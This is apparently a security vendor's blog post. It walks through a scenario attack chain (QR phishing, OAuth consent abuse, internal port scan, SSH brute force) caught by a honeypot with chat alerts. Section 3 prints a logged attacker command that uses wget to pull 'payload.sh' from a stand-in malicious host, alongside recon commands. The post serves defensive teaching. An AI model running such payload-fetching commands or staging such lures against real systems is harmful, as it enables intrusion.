‍2025-07-22 06:14:55 — Port scan detected: 93.184.216.42 → 10.0.5.42:22 (SYN)

TL;DR

A novel attack chain began with a QR code phishing (quishing) campaign that tricked a user into scanning a malicious code with their personal phone (BYOD). The QR led to an OAuth token abuse via a spoofed Microsoft 365 consent screen — no malware, no credentials stolen. With access gained, the attacker conducted a port scan inside the corporate network, detected by a honeypot. This was followed by an SSH brute-force attack, eventually leading to interactive shell access on the honeypot. Each step was detected in real-time via Slack/Teams integration. The entire incident—from network access to shell commands—was visible, logged, and timestamped for forensics. This demonstrates the power of honeypots as low-cost, high-impact detection tools against stealthy, perimeter-bypassing attacks.

1 | Entry Point: QR Phishing & Token Abuse

A new type of attack leaves traditional defenses nearly blind: a phishing email with a QR code — also known as “quishing.” Imagine an employee receives a very convincing parking fine via email, complete with a QR code to “pay immediately.” No clickable link — just a QR code. Many security filters won’t flag that.

The unfortunate user scans the code with a personal phone (BYOD). What they don’t realize is that the QR link opens a cleverly disguised OAuth login page in the phone’s browser. Using HTML smuggling techniques, malicious code is hidden inside the page — it looks just like a normal Microsoft 365 OAuth consent screen, complete with logos. Because this happens on a private device, the company proxy or firewall sees nothing. The user unsuspectingly clicks “Accept” on the OAuth screen. Bingo: the attacker now holds a valid access token for the account — no stolen credentials or malware required.

🔍 Call-out: Your firewall can’t see what the phone camera sees. Whatever the user scans with their phone rarely hits your network. In other words: BYOD + QR code = blind spot for traditional network security. No Next-Gen appliance will detect it, because nothing suspicious crosses your infrastructure.

In this scenario, the attacker now has access to internal resources. For example: the OAuth token could give access to SharePoint or an email account containing VPN credentials or internal links. The exact impact may vary, but the point stands: without your IDS/IPS or EDR noticing anything, the attacker has gained a foothold in your corporate network.

2 | First Alarm: Port Scan on the Network

Once inside, the attacker wastes no time. Seconds after the compromise, a quick scan is executed: an nmap -sS port scan of the internal subnet. This is often the first step of lateral movement — checking what systems exist and what services are open.

Our honeypot on IP 10.0.5.42 responds to this scan. It simulates active services on port 22 (SSH) and 3306 (MySQL), returning SYN-ACKs to each SYN request from the attacker. The built-in port scan detector recognizes the pattern and generates an alert as soon as multiple ports are probed. An automatic notification is triggered via Slack or Teams.

Your SOC (or IT team) sees a late-night message pop up: “Honeypot port scan from 93.184.216.42.” Maybe someone is startled awake by the phone. But more importantly: you now have visibility. Someone (or something) is scanning the internal network — and that should never happen. This is the first alarm.

This early detection is critical. Traditional monitoring often misses or delays noticing internal scans (they don’t always produce clear log events). But with a honeypot, every scan packet is 100% suspicious. We now have a clear IOC and can respond immediately — before any real damage is done.

3 | Second Alarm: Brute Force and Interaction

A port scan is usually just preparation. Shortly after, the attacker attempts to break into the interesting machine they discovered — our honeypot. A brute-force attack on SSH follows. Hundreds of passwords are fired off within minutes. The honeypot allows this and stays responsive (configured specifically to not block too early). This increases its credibility — a real server that instantly locks out all attempts would look suspicious.

After several failed attempts, we deliberately let one through. Suppose the honeypot is configured to accept admin/welcome1 as valid credentials (a classic weak password). Once the attacker logs in successfully, we present them with an interactive bash shell. Another alert: “Honeypot SSH login by admin from IP 93.184.216.42” pops up in Slack/Teams. Now it’s clear: someone has obtained system access and is executing commands.

And we literally see it happening. The high-interaction SSH honeypot logs every command with timestamps and optional output. For example:

uname -a           # to check which system they’ve compromised
cat /etc/hosts     # to see hostnames and IPs for orientation
wget http://malicious.server/payload.sh   # attempting to pull in a second-stage payload


These actions are immediately visible in the live logs. Every step is relayed in real-time via webhook. A security analyst watching Slack can see each command — like looking over the attacker’s shoulder. Meanwhile, the honeypot behaves like a real server, returning plausible output to commands like uname -a to avoid raising suspicion.

4 | Reconstruction: What Happened, and When?

Let’s outline the events in logical order:

• A user scans a QR code from a phishing email — likely on their personal phone.
• Soon after, the attacker runs a port scan on the internal network. The honeypot receives SYN traffic on ports 22 and 3306, and responds as if real services are running. This triggers the first alert.
• Shortly after, the attacker attempts to log in. A weak password like “welcome1” is accepted, resulting in a second alert.
• The first commands are logged: uname, cat /etc/hosts, and other typical recon actions. The SOC sees the activity live.
• The incident is classified, and escalation follows. The affected network segment is isolated to prevent further spread.

→ This shows how a honeypot gives valuable visibility into an intruder's actions. From initial access to interactive shell — every step is caught. Rather than an attacker moving silently, you get immediate signals — long before damage is done.

5 | What’s the Value? Analysis & Impact

Yes, this incident means work. But thanks to the honeypot, we have excellent data for response and forensic analysis:

• Export: All events and timestamps are stored cleanly. With one click, export a CSV timeline for post-mortem reporting: who/what/when, precisely.
• Measurable Metrics: With the entire chain logged, you can calculate:
  • Time between attack and detection: How much faster is that compared to your traditional tooling?
  • Time between detection and response: How quickly did your team act after the first alert?
  • Number of login attempts & credentials used: For example, the honeypot logs 534 password attempts, and which one succeeded. This shows attacker persistence and whether common passwords were used.
• Cost Efficiency: All of this was detected by a single VM running smart software. Unlike expensive NDR appliances that inspect traffic flows, this lone honeypot delivered faster and more precise visibility into a real attack. Dwell time dropped from 10+ days to sometimes even seconds — at a fraction of the cost.

Of course, a honeypot doesn’t replace your other defenses. But the price/performance ratio is exceptionally strong.

6 | Key Takeaways

Let’s summarize the most important lessons:

• Firewalls can’t protect against QR codes and BYOD scans. Attacks can happen outside traditional perimeters, and you won’t see them.
• EDR doesn’t catch token abuse. Agentless attacks using cloud tokens or session cookies go unnoticed. Once inside the cloud or on unmanaged devices, your endpoint visibility is gone.
• Port scan detection is surprisingly powerful and cheap. Even basic recon reveals an attacker’s presence — if you have a honeypot listening. No fancy AI required — a SYN in the right place is enough to raise the alarm.
• Honeypots integrate easily with Slack or Teams — no SIEM required. Real-time visibility without massive integration projects. A webhook takes minutes to set up.
• High-interaction honeypots provide actionable logs for IR reports. You capture the attacker’s actual commands and tactics. This intel is gold for your Incident Response team and for hardening your defenses.

Bottom line: a honeypot isn’t a magic shield — it’s a smart trap. In this era of creative attacks (from QR phishing to token theft), having an extra pair of eyes inside your network isn’t a luxury — it’s a low-cost safety net. As we’ve seen, an eight-second lead can make all the difference. ⏱️